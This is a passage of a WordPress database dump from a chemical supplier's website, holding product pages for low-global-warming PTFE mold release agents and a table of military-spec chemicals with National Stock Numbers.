particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-26 12:45:41', '2016-10-26 12:45:41', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2761, 120, '2016-10-26 14:54:03', '2016-10-26 14:54:03', '', '', '', 'publish', 'closed', 'closed', '', '2761', '', '', '2016-10-26 14:54:03', '2016-10-26 14:54:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/2761/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2762, 96, '2016-10-26 15:22:27', '2016-10-26 15:22:27', '', '', '', 'publish', 'closed', 'closed', '', '2762', '', '', '2016-10-26 15:22:27', '2016-10-26 15:22:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/2762/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2763, 2, '2016-10-26 17:34:57', '2016-10-26 17:34:57', '<h1><strong>MS-122ADL Low Global Warming Release Agent / Dry Lubricant</strong></h1>\r\nMS-122ADL was developed as an efficient, economical and universal low global warming release agent. This formulation contains a high lubricity, low molecular weight PTFE fluoropolymer specialized for mold release and dry lubricant applications. A nonflammable, non-ozone depleting carrier solvent / propellant mixture ensures all environmental regulations are met. MS-122ADL offers the following benefits:\r\n<ul>\r\n 	<li>Cost-effective release of molded parts</li>\r\n 	<li>Outstanding lubricity and minimization of slip-stick</li>\r\n 	<li>Nonflammable, Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\n<h4><strong>Release Agent Applications</strong></h4>\r\nMS-122ADL can be used to release the following materials with virtually no transfer of the release agent:\r\n<ul>\r\n 	<li>Plastics</li>\r\n 	<li>Rubbers</li>\r\n 	<li>Resins</li>\r\n 	<li>Phenolics</li>\r\n 	<li>Acrylics</li>\r\n 	<li>Polycarbonates</li>\r\n 	<li>Urethanes</li>\r\n 	<li>Polystyrene</li>\r\n 	<li>Nylons</li>\r\n 	<li>Elastomers</li>\r\n</ul>\r\n<h4><strong>Dry Lubricant Applications</strong></h4>\r\nAs a dry lubricant, MS-122ADL is applicable on a variety of materials and will afford unmatched lubricity and wear resistance. These materials include:\r\n<ul>\r\n 	<li>Metal</li>\r\n 	<li>Ceramics</li>\r\n 	<li>Glass</li>\r\n 	<li>Elastomers</li>\r\n 	<li>Rubber</li>\r\n 	<li>Polycarbonates</li>\r\n 	<li>Wood</li>\r\n 	<li>Elastomers</li>\r\n</ul>\r\n<h4></h4>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Physical Properties</strong></td>\r\n<td width="206"></td>\r\n</tr>\r\n<tr>\r\n<td>Primary Polymer</td>\r\n<td style="text-align: center;">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">White Particle suspension</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td style="text-align: center;">Slight</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">1.20 g/mL @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone depletion</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td style="text-align: center;">84 g / L</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4>Clean mold surface thoroughly. Mechanical cleaning followed by chemical cleaning, provides the best surface for application of 122ADL. Removal of all previous mold release agent is critical.</h4>\r\n<h4><strong>Recommended Application Procedure:</strong></h4>\r\n<ol>\r\n 	<li>Clean mold surface thoroughly. Mechanical cleaning followed by chemical cleaning, provides the best surface for application of 122ADL. Removal of all previous mold release agent is critical.</li>\r\n 	<li>Shake can vigorously for one minute. Hold can approximately 6-8 inches away from a nonheated mold surface, and apply a light coat of release agent.</li>\r\n 	<li>Allow solvent to dry completely before molding any parts. This will ensure the most effective coating for durability and cycle life.</li>\r\n</ol>\r\n<h4><strong>Reapplication:</strong></h4>\r\n<ol>\r\n 	<li>When release becomes hesitant, reapply one coat of MS-122ADL in the same manner as described above.</li>\r\n</ol>\r\n<h4><strong>Fused Coatings Procedure</strong></h4>\r\n<ol>\r\n 	<li>After applying the release agent, heat the surface to 581ºF - 600ºF. Coating will transition from white to translucent. Maintain for 10 minutes.</li>\r\n 	<li>If a white residue is left on the metal surface, buff with a soft cloth.</li>\r\n</ol>\r\n<h4></h4>', 'MS-122ADL', 'MS-122ADL is an eco-friendly, low-global warming formulation of MS-122AD. All performance and application characteristics are maintained.\r\n\r\n<img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'publish', 'closed', 'closed', '', 'ms-122adl-low-global-warming-release-agent', '', '', '2017-05-26 13:01:09', '2017-05-26 13:01:09', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2763', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2764, 2, '2016-10-26 17:25:03', '2016-10-26 17:25:03', '', 'adl-comparison', '', 'inherit', 'closed', 'closed', '', 'adl-comparison', '', '', '2016-10-26 17:25:03', '2016-10-26 17:25:03', '', 2763, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/adl-comparison.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (2766, 2, '2016-10-26 17:39:55', '2016-10-26 17:39:55', '', 'lgw2', '', 'inherit', 'closed', 'closed', '', 'lgw2', '', '', '2016-10-26 17:39:55', '2016-10-26 17:39:55', '', 2763, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2767, 2, '2016-10-26 17:48:49', '2016-10-26 17:48:49', '<h1><strong>MS-122ADL Low Global Warming Release Agent / Dry Lubricant</strong></h1>\nMS-122ADL was developed as an efficient, economical and universal low global warming release agent. This formulation contains a high lubricity, low molecular weight PTFE fluoropolymer specialized for mold release and dry lubricant applications. A nonflammable, non-ozone depleting carrier solvent / propellant mixture ensures all environmental regulations are met. MS-122ADL offers the following benefits:\n<ul>\n 	<li>Cost-effective release of molded parts</li>\n 	<li>Outstanding lubricity and minimization of slip-stick</li>\n 	<li>Nonflammable, Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>\n<h4><strong>Release Agent Applications</strong></h4>\nMS-122ADL can be used to release the following materials with virtually no transfer of the release agent:\n<ul>\n 	<li>Plastics</li>\n 	<li>Rubbers</li>\n 	<li>Resins</li>\n 	<li>Phenolics</li>\n 	<li>Acrylics</li>\n 	<li>Polycarbonates</li>\n 	<li>Urethanes</li>\n 	<li>Polystyrene</li>\n 	<li>Nylons</li>\n 	<li>Elastomers</li>\n</ul>\n<h4><strong>Dry Lubricant Applications</strong></h4>\nAs a dry lubricant, MS-122ADL is applicable on a variety of materials and will afford unmatched lubricity and wear resistance. These materials include:\n<ul>\n 	<li>Metal</li>\n 	<li>Ceramics</li>\n 	<li>Glass</li>\n 	<li>Elastomers</li>\n 	<li>Rubber</li>\n 	<li>Polycarbonates</li>\n 	<li>Wood</li>\n 	<li>Elastomers</li>\n</ul>\n<h4>\nClean mold surface thoroughly. Mechanical cleaning followed by chemical cleaning, provides the best surface for application of 122ADL. Removal of all previous mold release agent is critical.<strong>Recommended Application Procedure:</strong></h4>\n<ol>\n 	<li>Shake can vigorously for one minute. Hold can approximately 6-8 inches away from a nonheated mold surface, and apply a light coat of release agent.</li>\n 	<li>Allow solvent to dry completely before molding any parts. This will ensure the most effective coating for durability and cycle life.</li>\n</ol>\n<h4><strong>Reapplication:</strong></h4>\n<ol>\n 	<li>When release becomes hesitant, reapply one coat of MS-122ADL in the same manner as described above.</li>\n</ol>\n<h4><strong>Fused Coatings Procedure</strong></h4>\n<ol>\n 	<li>After applying the release agent, heat the surface to 581ºF - 600ºF. Coating will transition from white to translucent. Maintain for 10 minutes.</li>\n 	<li>If a white residue is left on the metal surface, buff with a soft cloth.</li>\n</ol>\n<h4><strong>MS-122 Product Line:</strong></h4>\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process. The MS-122 Series will deliver higher productivity, lower rejection rates, and higher\nquality products. Please use the selection guide below to help direct you to the appropriate product.\n\n<img class="alignnone size-full wp-image-2764" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/adl-comparison.png" alt="adl-comparison" width="556" height="265" />', 'MS-122ADL', '<strong>As a Release Agent: </strong>An excellent universal release agent, highly effective when applied to rubber molds. Provides a very uniform coating.\n<br /><br />\n<img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'inherit', 'closed', 'closed', '', '2763-autosave-v1', '', '', '2016-10-26 17:48:49', '2016-10-26 17:48:49', '', 2763, 'https://www.miller-stephenson.com/2763-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2768, 2, '2016-10-26 17:41:46', '2016-10-26 17:41:46', '', 'Low Global Warming Release Agent', '', 'inherit', 'closed', 'closed', '', 'shutterstock_318864752', '', '', '2016-10-26 17:42:11', '2016-10-26 17:42:11', '', 2763, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_318864752.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2769, 2, '2016-10-26 18:14:00', '2016-10-26 18:14:00', 'MS-122AVL Low global warming mold release agent combines high efficiency low-molecular weight polytetrafluoroethylene (PTFE) and proprietary surface activation chemistry. This formulation yields superior adhesion of PTFE to metallic, glass, and nonplastic surfaces. The result is unmatched durability, extended reapplication intervals and virtually no transfer. MS-122AVL low global warming mold release agent advantages include:\r\n<ul>\r\n 	<li>Unparalleled release agent durability</li>\r\n 	<li>Ideal for difficult mold geometries</li>\r\n 	<li>Improves quality and consistency of molded parts</li>\r\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\n<h4><strong>Recommended Application Procedure:</strong></h4>\r\n<ol>\r\n 	<li>Clean mold surface thoroughly. Mechanical cleaning such as bead media blasting or steel wool, followed by chemical cleaning, provides the best surface for application of 122AVL. Removal of all previous mold release agent is critical.</li>\r\n 	<li>Shake can vigorously for one minute. Hold can approximately 6-8 inches away from a nonheated mold surface, and apply a light coat of release agent. NOTE: Material will apply wet and transparent, but will dry to a fine-white coat.</li>\r\n 	<li>Allow solvent to dry completely before molding any parts. Although it is not necessary to heat MS-122AVL, performance can be enhanced if a heating cycle is completed prior to operation. This will ensure the most effective coating for durability and cycle life.</li>\r\n</ol>\r\nMiller-Stephenson has been developing PTFE release agents for over 40 years. We have been at the forefront of development of low global warming mold release agents, typically exceeding or current and future regulatory requirements. This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE’s chemical inertness and low-transfer will not interfere with the sensitive electronics.\r\n\r\nProduction engineers will typically choose PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AVL and MS-122SEL are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-122AVL', 'MS-122AVL is an eco-friendly, low-global warming formulation of MS-122AV. All performance and application characteristics are maintained.\r\n\r\n<img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'publish', 'closed', 'closed', '', 'ms-122avl-low-global-warming-mold-release', '', '', '2017-05-26 13:00:47', '2017-05-26 13:00:47', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2769', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2770, 2, '2016-10-26 18:13:18', '2016-10-26 18:13:18', '', 'Low Global Warming Mold', '', 'inherit', 'closed', 'closed', '', 'shutterstock_161916098', '', '', '2016-10-26 18:13:49', '2016-10-26 18:13:49', '', 2769, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_161916098.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2771, 2, '2016-10-26 18:26:31', '2016-10-26 18:26:31', 'MS-122SEL Low Global Warming mold release agent (LGW) formulation that has high performance, high solvency mold release agent utilizing PTFE fluoropolymers (polytetrafluoroethylene) specifically designed for unsurpassed adhesion to mold surfaces and extended durability. The proprietary solvent blend ensures that proper wetting, leveling, and surface preparation occurs when applied yielding a durable, uniform thin-film. MS-122SEL offers the following benefits:\r\n<ul>\r\n 	<li>Superior adhesion to mold surfaces</li>\r\n 	<li>High Solvency/Rapid Evaporating Carrier Fluid</li>\r\n 	<li>Ideal for compression/injection molding</li>\r\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n</ul>\r\nMS-122SEL can be used to release the following materials:\r\n<ul>\r\n 	<li>Plastics</li>\r\n 	<li>Rubbers</li>\r\n 	<li>Resins</li>\r\n 	<li>Phenolics</li>\r\n 	<li>Acrylics</li>\r\n 	<li>Polycarbonates</li>\r\n 	<li>Urethanes</li>\r\n 	<li>Polystyrene</li>\r\n 	<li>Nylons</li>\r\n 	<li>Elastomers</li>\r\n</ul>\r\n<strong>Recommended Application Procedure:</strong>\r\n<ol>\r\n 	<li>Clean mold surface thoroughly. Mechanical cleaning such as, bead media blasting or steel wool, followed by chemical cleaning, provides the best surface for application of 122SEL. Removal of all previous mold release agent is critical.</li>\r\n 	<li>Shake can vigorously for one minute. Hold can approximately 6-8 inches away from a nonheated mold surface, and apply a light coat of release agent. NOTE: Material will apply wet and transparent, but will dry to a fine-white coat.</li>\r\n 	<li>Allow solvent to dry completely before molding any parts. This will ensure the most effective coating for durability and cycle life.</li>\r\n</ol>\r\nMiller-Stephenson has been developing PTFE release agents for over 40 years. We have been at the forefront of development of low global warming mold release agents, typically exceeding or current and future regulatory requirements. This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE’s chemical inertness and low-transfer will not interfere with the sensitive electronics.\r\n\r\nProduction engineers will typically choose PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AVL and MS-122SEL Low Global Warming Mold Release Agent is a formulations which increases the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-122SEL', 'MS-122SEL is an eco-friendly, low-global warming formulation of MS-122SE. All performance and application characteristics are maintained\r\n\r\n<img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'publish', 'closed', 'closed', '', 'low-global-warming-ptfe-release-agent', '', '', '2017-05-26 13:00:26', '2017-05-26 13:00:26', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2771', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2772, 2, '2016-10-26 18:26:01', '2016-10-26 18:26:01', '', 'MS-122SEL Low Global Warming Mold Release Agent', 'MS-122SEL Low Global Warming Mold Release Agent', 'inherit', 'closed', 'closed', '', 'shutterstock_495450013', '', '', '2016-10-27 12:58:00', '2016-10-27 12:58:00', '', 2771, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_495450013.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2773, 2, '2016-10-26 20:02:42', '2016-10-26 20:02:42', '<h1><strong>Military Spec Chemicals and NSN</strong></h1>\r\nMiller-Stephenson offers a wide variety of military spec chemicals and lubrication products.\r\n\r\nWe carry:\r\n<ul>\r\n 	<li>Solvent Cleaners</li>\r\n 	<li>Solvent Flux Removers</li>\r\n 	<li>Contact Cleaner</li>\r\n 	<li>Conformal Coatings</li>\r\n 	<li>Specialty Products</li>\r\n 	<li>Epoxy Resins / Curings Agents</li>\r\n 	<li>Release Agents / Dry Lubricants</li>\r\n 	<li>Krytox Performance Lubricants</li>\r\n</ul>\r\nWe have:\r\n<ul>\r\n 	<li>Military Specifications (Mil-Spec)</li>\r\n 	<li>National Stock Numbers (NSN)</li>\r\n 	<li>Underwriters Laboratories (UL) Numbers</li>\r\n 	<li>Qualified Products List (QPL)</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/chemicals/solvents/"><strong>Solvent Cleaners</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-720722/">MS-720</a></td>\r\n<td style="text-align: center;">Precision Cleaning Agent</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-1819</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-755l/">MS-755</a></td>\r\n<td style="text-align: center;">Vertrel SMT Heavy Duty Solvent &amp; Flux Remover</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-521-5719</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-775</td>\r\n<td style="text-align: center;">Vertrel XE Cleaning Agent</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-1809</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-780</td>\r\n<td style="text-align: center;">Vertrel XF Cleaning Agent</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-460-4914</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-mca/">Vertrel MCA</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">5 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5658</td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-mca/">Vertrel MCA</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5661</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-smt/">Vertrel SMT</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">5 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5662</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-smt/">Vertrel SMT</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5664</td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel XF</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">5 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5659</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel XF</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5660</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/solvents/solvsys/flux-removers/"><strong>Solvent Flux Removers</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-755l/">MS-755</a></td>\r\n<td style="text-align: center;">Vertrel SMT Heavy Duty Solvent &amp; Flux Remover</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-521-5719</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/solvents/solvsys/contact-cleaners/"><strong>Contact Cleaners</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/contact-re-nu/">MS-730</a></td>\r\n<td style="text-align: center;">Safezone Contact Re-Nu</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-1815</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/"><strong>Conformal Coatings</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td width="206">Description</td>\r\n<td width="206">Container</td>\r\n<td width="206">National Stock Number (NSN)</td>\r\n<td width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/silicone-conformal-coatings/">MS-460H</a></td>\r\n<td>Silicone Conformal Coating, moisture and fungal resistance, for communications, electronic and associated electrical equipment</td>\r\n<td>Aerosol</td>\r\n<td>UL #746E</td>\r\n<td>MIL-I-46058C Type SR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/silicone-electronic-coating/">MS-462H</a></td>\r\n<td>Silicone Conformal Coating, moisture and fungal resistance, for communications, electronic and associated electrical equipment</td>\r\n<td>Qt, Gal, 5 Gal</td>\r\n<td>UL #746E</td>\r\n<td>MIL-I-46058C Type SR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/mil-spec-urethane-conformal-coating/">MS-470S</a></td>\r\n<td>Superior toughness and abrasion resistance and excellent protection for humidity and organic solvents. Includes an ultraviolet (UV) indicator.</td>\r\n<td>Aerosol</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type UR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-472s/">MS-472S</a></td>\r\n<td>Superior toughness and abrasion resistance and excellent protection for humidity and organic solvents. Includes an ultraviolet (UV) indicator.</td>\r\n<td>Qt, Gal, 5 Gal</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type UR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/acrylic-conformal-coatings/">MS-475C</a></td>\r\n<td>Acrylic Conformal Coating, moisture and fungus resistant, for communications, electronic, and associated electrical equipment</td>\r\n<td>Aerosol</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type AR*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/acrylic-conformal-coating-mil-spec/">MS-477C</a></td>\r\n<td>Acrylic Conformal Coating, moisture and fungus resistant, for communications, electronic, and associated electrical equipment</td>\r\n<td>Qt, Gal, 5 Gal</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type AR*</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/specialty-products/"><strong>Specialty Products</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/aeroduster-ms-222n/">MS-222N</a></td>\r\n<td style="text-align: center;">Aero-Duster</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-346-9144</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/cobra-duster/">MS-228</a></td>\r\n<td style="text-align: center;">Cobra Brush, Aerosol Attachment</td>\r\n<td style="text-align: center;">Kit</td>\r\n<td style="text-align: center;">7920-00-134-1998</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/quik-freeze/">MS-242N</a></td>\r\n<td style="text-align: center;">Quik-Freeze</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-333-1841</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/">MS-260</a></td>\r\n<td style="text-align: center;">Plastic/Glass/Metal Cleaner</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">7930-01-064-5179</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-381h/">MS-381H</a></td>\r\n<td style="text-align: center;">Connector Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-8521</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-381HUV</td>\r\n<td style="text-align: center;">Connector Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-367-8095</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-383H</td>\r\n<td style="text-align: center;">Connector Lubricant</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">6850-01-538-3496</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-907-two-part-epoxy-adhesive/">MS-907</a></td>\r\n<td style="text-align: center;">Epoxy Adhesive Kit (Two Part)</td>\r\n<td style="text-align: center;">2-2 oz Tubes</td>\r\n<td style="text-align: center;">8040-00-144-9729</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/"><strong>Epoxy Resins / Curing Agents</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epikure-3125/">Epikure 3125</a></td>\r\n<td style="text-align: center;">Curing Agent Polyamide</td>\r\n<td style="text-align: center;">Gallon</td>\r\n<td style="text-align: center;">8040-00-139-4350</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epikure-3140/">Epikure 3140</a></td>\r\n<td style="text-align: center;">Curing Agent Polyamide</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">8040-01-498-4975</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Pint</td>\r\n<td style="text-align: center;">8030-00-086-1506</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: 